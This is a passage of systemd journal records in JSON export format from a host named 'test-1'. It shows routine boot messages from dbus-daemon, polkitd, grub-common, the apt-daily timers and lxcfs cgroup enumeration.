: "107", "_COMM" : "dbus-daemon", "_EXE" : "/usr/bin/dbus-daemon", "_CMDLINE" : "/usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only", "_CAP_EFFECTIVE" : "20000000", "_SYSTEMD_CGROUP" : "/system.slice/dbus.service", "_SYSTEMD_UNIT" : "dbus.service", "_SYSTEMD_INVOCATION_ID" : "ade09c21b8de4fb6a382892237c7d413", "MESSAGE" : "[system] Activating via systemd: service name='org.freedesktop.hostname1' unit='dbus-org.freedesktop.hostname1.service' requested by ':1.0' (uid=100 pid=600 comm=\"/lib/systemd/systemd-networkd \" label=\"unconfined\")", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818337092" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2e6;b=e2b08827b5804427b422c10c84f1567e;m=2a5f587;t=5bd16df6974ee;x=d0573be2806b787a", "__REALTIME_TIMESTAMP" : "1615280818713838", "__MONOTONIC_TIMESTAMP" : "44430727", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Listening on D-Bus System Message Bus Socket.", "UNIT" : "dbus.socket", "INVOCATION_ID" : "8b5e9356754c4f3794b0647122801a1a", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817945476" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2e7;b=e2b08827b5804427b422c10c84f1567e;m=2a5f633;t=5bd16df69759b;x=d60627d30e6fb974", "__REALTIME_TIMESTAMP" : "1615280818714011", "__MONOTONIC_TIMESTAMP" : "44430899", 
"_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "dbus-daemon", "SYSLOG_PID" : "790", "_PID" : "790", "_UID" : "103", "_GID" : "107", "_COMM" : "dbus-daemon", "_EXE" : "/usr/bin/dbus-daemon", "_CMDLINE" : "/usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only", "_CAP_EFFECTIVE" : "20000000", "_SYSTEMD_CGROUP" : "/system.slice/dbus.service", "_SYSTEMD_UNIT" : "dbus.service", "_SYSTEMD_INVOCATION_ID" : "ade09c21b8de4fb6a382892237c7d413", "MESSAGE" : "[system] Activating via systemd: service name='org.freedesktop.PolicyKit1' unit='polkit.service' requested by ':1.4' (uid=0 pid=786 comm=\"/usr/lib/accountsservice/accounts-daemon \" label=\"unconfined\")", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818366298" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2e8;b=e2b08827b5804427b422c10c84f1567e;m=2a5f763;t=5bd16df6976cb;x=975c82288defccda", "__REALTIME_TIMESTAMP" : "1615280818714315", "__MONOTONIC_TIMESTAMP" : "44431203", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Started Daily apt download activities.", "UNIT" : 
"apt-daily.timer", "INVOCATION_ID" : "95548d7e62714445aee757aca3c79eb9", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817951929" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2e9;b=e2b08827b5804427b422c10c84f1567e;m=2a5f7ec;t=5bd16df697753;x=dba300a7ab8017ea", "__REALTIME_TIMESTAMP" : "1615280818714451", "__MONOTONIC_TIMESTAMP" : "44431340", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "polkitd", "SYSLOG_PID" : "823", "MESSAGE" : "started daemon version 0.105 using authority implementation `local' version `0.105'", "_PID" : "823", "_COMM" : "polkitd", "_EXE" : "/usr/lib/policykit-1/polkitd", "_CMDLINE" : "/usr/lib/policykit-1/polkitd --no-debug", "_SYSTEMD_CGROUP" : "/system.slice/polkit.service", "_SYSTEMD_UNIT" : "polkit.service", "_SYSTEMD_INVOCATION_ID" : "f8c33888140c415190c7d25f87c0b41e", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818552346" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2ea;b=e2b08827b5804427b422c10c84f1567e;m=2a5f925;t=5bd16df69788c;x=74aecea21f3d04f8", "__REALTIME_TIMESTAMP" : "1615280818714764", "__MONOTONIC_TIMESTAMP" : "44431653", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "147c3fcb1fd64c35bb2ad71aaf67c98f", "SYSLOG_IDENTIFIER" : "grub-common", "MESSAGE" : " * Recording successful boot for GRUB", "_PID" : "788", "_SYSTEMD_UNIT" : "grub-common.service", "_SYSTEMD_INVOCATION_ID" : "ba0792509caa4bd78d4591f02aac479a" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2eb;b=e2b08827b5804427b422c10c84f1567e;m=2a5f925;t=5bd16df69788c;x=af6dda4d3d12f932", "__REALTIME_TIMESTAMP" : "1615280818714764", "__MONOTONIC_TIMESTAMP" : "44431653", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_TRANSPORT" : "stdout", "MESSAGE" : " ...done.", "_HOSTNAME" : "test-1", "_STREAM_ID" : "147c3fcb1fd64c35bb2ad71aaf67c98f", "SYSLOG_IDENTIFIER" : "grub-common", "_PID" : "788", "_SYSTEMD_UNIT" : "grub-common.service", "_SYSTEMD_INVOCATION_ID" : "ba0792509caa4bd78d4591f02aac479a" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2ec;b=e2b08827b5804427b422c10c84f1567e;m=2a60023;t=5bd16df697f8b;x=17aed942f3125518", "__REALTIME_TIMESTAMP" : "1615280818716555", "__MONOTONIC_TIMESTAMP" : "44433443", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Started Daily apt upgrade and clean activities.", "UNIT" : "apt-daily-upgrade.timer", "INVOCATION_ID" : "a52729bb66a64f499069fb0631cf1115", "_SOURCE_REALTIME_TIMESTAMP" : "1615280817959873" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2ed;b=e2b08827b5804427b422c10c84f1567e;m=2a600ad;t=5bd16df698014;x=b194780a247cfb8e", "__REALTIME_TIMESTAMP" : "1615280818716692", 
"__MONOTONIC_TIMESTAMP" : "44433581", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "syslog", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "dbus-daemon", "SYSLOG_PID" : "790", "_PID" : "790", "_UID" : "103", "_GID" : "107", "_COMM" : "dbus-daemon", "_EXE" : "/usr/bin/dbus-daemon", "_CMDLINE" : "/usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only", "_CAP_EFFECTIVE" : "20000000", "_SYSTEMD_CGROUP" : "/system.slice/dbus.service", "_SYSTEMD_UNIT" : "dbus.service", "_SYSTEMD_INVOCATION_ID" : "ade09c21b8de4fb6a382892237c7d413", "MESSAGE" : "[system] Successfully activated service 'org.freedesktop.PolicyKit1'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280818552765" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2ee;b=e2b08827b5804427b422c10c84f1567e;m=2a60192;t=5bd16df6980fa;x=d09af9eacaa4a0f4", "__REALTIME_TIMESTAMP" : "1615280818716922", "__MONOTONIC_TIMESTAMP" : "44433810", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "3c20edf1c9f34d15adab2b3f4b36a654", "SYSLOG_IDENTIFIER" : "lxcfs", "MESSAGE" : "mount namespace: 5", "_PID" : "789", "_COMM" : "lxcfs", "_EXE" : "/usr/bin/lxcfs", "_CMDLINE" : "/usr/bin/lxcfs /var/lib/lxcfs/", "_SYSTEMD_CGROUP" : "/system.slice/lxcfs.service", "_SYSTEMD_UNIT" : "lxcfs.service", "_SYSTEMD_INVOCATION_ID" : "6b09b6542bb74a3aa4be9634bca4d61c" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2ef;b=e2b08827b5804427b422c10c84f1567e;m=2a60192;t=5bd16df6980fa;x=eeeec5f11f290678", "__REALTIME_TIMESTAMP" : 
"1615280818716922", "__MONOTONIC_TIMESTAMP" : "44433810", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "3c20edf1c9f34d15adab2b3f4b36a654", "SYSLOG_IDENTIFIER" : "lxcfs", "_PID" : "789", "_COMM" : "lxcfs", "_EXE" : "/usr/bin/lxcfs", "_CMDLINE" : "/usr/bin/lxcfs /var/lib/lxcfs/", "_SYSTEMD_CGROUP" : "/system.slice/lxcfs.service", "_SYSTEMD_UNIT" : "lxcfs.service", "_SYSTEMD_INVOCATION_ID" : "6b09b6542bb74a3aa4be9634bca4d61c", "MESSAGE" : "hierarchies:" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2f0;b=e2b08827b5804427b422c10c84f1567e;m=2a60192;t=5bd16df6980fa;x=bc1ac33be7425c42", "__REALTIME_TIMESTAMP" : "1615280818716922", "__MONOTONIC_TIMESTAMP" : "44433810", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "3c20edf1c9f34d15adab2b3f4b36a654", "SYSLOG_IDENTIFIER" : "lxcfs", "_PID" : "789", "_COMM" : "lxcfs", "_EXE" : "/usr/bin/lxcfs", "_CMDLINE" : "/usr/bin/lxcfs /var/lib/lxcfs/", "_SYSTEMD_CGROUP" : "/system.slice/lxcfs.service", "_SYSTEMD_UNIT" : "lxcfs.service", "_SYSTEMD_INVOCATION_ID" : "6b09b6542bb74a3aa4be9634bca4d61c", "MESSAGE" : " 0: fd: 6: perf_event" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2f1;b=e2b08827b5804427b422c10c84f1567e;m=2a60192;t=5bd16df6980fa;x=28537ce1469cc4b2", "__REALTIME_TIMESTAMP" : "1615280818716922", "__MONOTONIC_TIMESTAMP" : "44433810", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : 
"e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "3c20edf1c9f34d15adab2b3f4b36a654", "SYSLOG_IDENTIFIER" : "lxcfs", "_PID" : "789", "_COMM" : "lxcfs", "_EXE" : "/usr/bin/lxcfs", "_CMDLINE" : "/usr/bin/lxcfs /var/lib/lxcfs/", "_SYSTEMD_CGROUP" : "/system.slice/lxcfs.service", "_SYSTEMD_UNIT" : "lxcfs.service", "_SYSTEMD_INVOCATION_ID" : "6b09b6542bb74a3aa4be9634bca4d61c", "MESSAGE" : " 1: fd: 7: pids" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2f2;b=e2b08827b5804427b422c10c84f1567e;m=2a60192;t=5bd16df6980fa;x=dd9f84cd45211f80", "__REALTIME_TIMESTAMP" : "1615280818716922", "__MONOTONIC_TIMESTAMP" : "44433810", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "3c20edf1c9f34d15adab2b3f4b36a654", "SYSLOG_IDENTIFIER" : "lxcfs", "_PID" : "789", "_COMM" : "lxcfs", "_EXE" : "/usr/bin/lxcfs", "_CMDLINE" : "/usr/bin/lxcfs /var/lib/lxcfs/", "_SYSTEMD_CGROUP" : "/system.slice/lxcfs.service", "_SYSTEMD_UNIT" : "lxcfs.service", "_SYSTEMD_INVOCATION_ID" : "6b09b6542bb74a3aa4be9634bca4d61c", "MESSAGE" : " 2: fd: 8: hugetlb" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2f3;b=e2b08827b5804427b422c10c84f1567e;m=2a60192;t=5bd16df6980fa;x=c60b3b8e02b0ff6e", "__REALTIME_TIMESTAMP" : "1615280818716922", "__MONOTONIC_TIMESTAMP" : "44433810", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", 
"_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "3c20edf1c9f34d15adab2b3f4b36a654", "SYSLOG_IDENTIFIER" : "lxcfs", "_PID" : "789", "_COMM" : "lxcfs", "_EXE" : "/usr/bin/lxcfs", "_CMDLINE" : "/usr/bin/lxcfs /var/lib/lxcfs/", "_SYSTEMD_CGROUP" : "/system.slice/lxcfs.service", "_SYSTEMD_UNIT" : "lxcfs.service", "_SYSTEMD_INVOCATION_ID" : "6b09b6542bb74a3aa4be9634bca4d61c", "MESSAGE" : " 3: fd: 9: freezer" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2f4;b=e2b08827b5804427b422c10c84f1567e;m=2a60192;t=5bd16df6980fa;x=e0b682b06fac3a58", "__REALTIME_TIMESTAMP" : "1615280818716922", "__MONOTONIC_TIMESTAMP" : "44433810", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "3c20edf1c9f34d15adab2b3f4b36a654", "SYSLOG_IDENTIFIER" : "lxcfs", "_PID" : "789", "_COMM" : "lxcfs", "_EXE" : "/usr/bin/lxcfs", "_CMDLINE" : "/usr/bin/lxcfs /var/lib/lxcfs/", "_SYSTEMD_CGROUP" : "/system.slice/lxcfs.service", "_SYSTEMD_UNIT" : "lxcfs.service", "_SYSTEMD_INVOCATION_ID" : "6b09b6542bb74a3aa4be9634bca4d61c", "MESSAGE" : " 4: fd: 10: memory" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2f5;b=e2b08827b5804427b422c10c84f1567e;m=2a60192;t=5bd16df6980fa;x=7fef776a74e9508e", "__REALTIME_TIMESTAMP" : "1615280818716922", "__MONOTONIC_TIMESTAMP" : "44433810", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : 
"3c20edf1c9f34d15adab2b3f4b36a654", "SYSLOG_IDENTIFIER" : "lxcfs", "_PID" : "789", "_COMM" : "lxcfs", "_EXE" : "/usr/bin/lxcfs", "_CMDLINE" : "/usr/bin/lxcfs /var/lib/lxcfs/", "_SYSTEMD_CGROUP" : "/system.slice/lxcfs.service", "_SYSTEMD_UNIT" : "lxcfs.service", "_SYSTEMD_INVOCATION_ID" : "6b09b6542bb74a3aa4be9634bca4d61c", "MESSAGE" : " 5: fd: 11: cpu,cpuacct" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2f6;b=e2b08827b5804427b422c10c84f1567e;m=2a60192;t=5bd16df6980fa;x=20ea5d2e14d8f9bf", "__REALTIME_TIMESTAMP" : "1615280818716922", "__MONOTONIC_TIMESTAMP" : "44433810", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "3c20edf1c9f34d15adab2b3f4b36a654", "SYSLOG_IDENTIFIER" : "lxcfs", "_PID" : "789", "_COMM" : "lxcfs", "_EXE" : "/usr/bin/lxcfs", "_CMDLINE" : "/usr/bin/lxcfs /var/lib/lxcfs/", "_SYSTEMD_CGROUP" : "/system.slice/lxcfs.service", "_SYSTEMD_UNIT" : "lxcfs.service", "_SYSTEMD_INVOCATION_ID" : "6b09b6542bb74a3aa4be9634bca4d61c", "MESSAGE" : " 6: fd: 12: devices" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2f7;b=e2b08827b5804427b422c10c84f1567e;m=2a60192;t=5bd16df6980fa;x=adb7445415f5f078", "__REALTIME_TIMESTAMP" : "1615280818716922", "__MONOTONIC_TIMESTAMP" : "44433810", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "3c20edf1c9f34d15adab2b3f4b36a654", "SYSLOG_IDENTIFIER" : "lxcfs", "_PID" : "789", "_COMM" : "lxcfs", "_EXE" : "/usr/bin/lxcfs", "_CMDLINE" : 
"/usr/bin/lxcfs /var/lib/lxcfs/", "_SYSTEMD_CGROUP" : "/system.slice/lxcfs.service", "_SYSTEMD_UNIT" : "lxcfs.service", "_SYSTEMD_INVOCATION_ID" : "6b09b6542bb74a3aa4be9634bca4d61c", "MESSAGE" : " 7: fd: 13: net_cls,net_prio" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2f8;b=e2b08827b5804427b422c10c84f1567e;m=2a60192;t=5bd16df6980fa;x=be4fe76ac79fe950", "__REALTIME_TIMESTAMP" : "1615280818716922", "__MONOTONIC_TIMESTAMP" : "44433810", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "3c20edf1c9f34d15adab2b3f4b36a654", "SYSLOG_IDENTIFIER" : "lxcfs", "_PID" : "789", "_COMM" : "lxcfs", "_EXE" : "/usr/bin/lxcfs", "_CMDLINE" : "/usr/bin/lxcfs /var/lib/lxcfs/", "_SYSTEMD_CGROUP" : "/system.slice/lxcfs.service", "_SYSTEMD_UNIT" : "lxcfs.service", "_SYSTEMD_INVOCATION_ID" : "6b09b6542bb74a3aa4be9634bca4d61c", "MESSAGE" : " 8: fd: 14: blkio" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2f9;b=e2b08827b5804427b422c10c84f1567e;m=2a60192;t=5bd16df6980fa;x=b6e830dc214e9808", "__REALTIME_TIMESTAMP" : "1615280818716922", "__MONOTONIC_TIMESTAMP" : "44433810", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "3c20edf1c9f34d15adab2b3f4b36a654", "SYSLOG_IDENTIFIER" : "lxcfs", "_PID" : "789", "_COMM" : "lxcfs", "_EXE" : "/usr/bin/lxcfs", "_CMDLINE" : "/usr/bin/lxcfs /var/lib/lxcfs/", "_SYSTEMD_CGROUP" : "/system.slice/lxcfs.service", "_SYSTEMD_UNIT" : "lxcfs.service", "_SYSTEMD_INVOCATION_ID" 
: "6b09b6542bb74a3aa4be9634bca4d61c", "MESSAGE" : " 9: fd: 15: rdma" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2fa;b=e2b08827b5804427b422c10c84f1567e;m=2a60192;t=5bd16df6980fa;x=54723fbc28f831a1", "__REALTIME_TIMESTAMP" : "1615280818716922", "__MONOTONIC_TIMESTAMP" : "44433810", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "3c20edf1c9f34d15adab2b3f4b36a654", "SYSLOG_IDENTIFIER" : "lxcfs", "_PID" : "789", "_COMM" : "lxcfs", "_EXE" : "/usr/bin/lxcfs", "_CMDLINE" : "/usr/bin/lxcfs /var/lib/lxcfs/", "_SYSTEMD_CGROUP" : "/system.slice/lxcfs.service", "_SYSTEMD_UNIT" : "lxcfs.service", "_SYSTEMD_INVOCATION_ID" : "6b09b6542bb74a3aa4be9634bca4d61c", "MESSAGE" : " 10: fd: 16: cpuset" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2fb;b=e2b08827b5804427b422c10c84f1567e;m=2a60192;t=5bd16df6980fa;x=4088854d132749ea", "__REALTIME_TIMESTAMP" : "1615280818716922", "__MONOTONIC_TIMESTAMP" : "44433810", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "3c20edf1c9f34d15adab2b3f4b36a654", "SYSLOG_IDENTIFIER" : "lxcfs", "_PID" : "789", "_COMM" : "lxcfs", "_EXE" : "/usr/bin/lxcfs", "_CMDLINE" : "/usr/bin/lxcfs /var/lib/lxcfs/", "_SYSTEMD_CGROUP" : "/system.slice/lxcfs.service", "_SYSTEMD_UNIT" : "lxcfs.service", "_SYSTEMD_INVOCATION_ID" : "6b09b6542bb74a3aa4be9634bca4d61c", "MESSAGE" : " 11: fd: 17: name=systemd" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=2fc;b=e2b08827b5804427b422c10c84f1567e;m=2a60192;t=5bd16df6980fa;x=47878a04061de12c", "__REALTIME_TIMESTAMP" : "1615280818716922", "__MONOTONIC_TIMESTAMP" : "44433810", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_HOSTNAME" : "test-1", "_STREAM_ID" : "3c20edf1c9f34d15adab2b3f4b36a654", "SYSLOG_IDENTIFIER" : "lxcfs", "_PID" : "789", "_COMM" : "lxcfs", "_EXE" : "/usr/bin/lxcfs", "_CMDLINE" : "/usr/bin/lxcfs /var/lib/lxcfs/", "_SYSTEMD_CGROUP" : "/system.slice/lxcfs.service", "_SYSTEMD_UNIT" : "lxcfs.service", 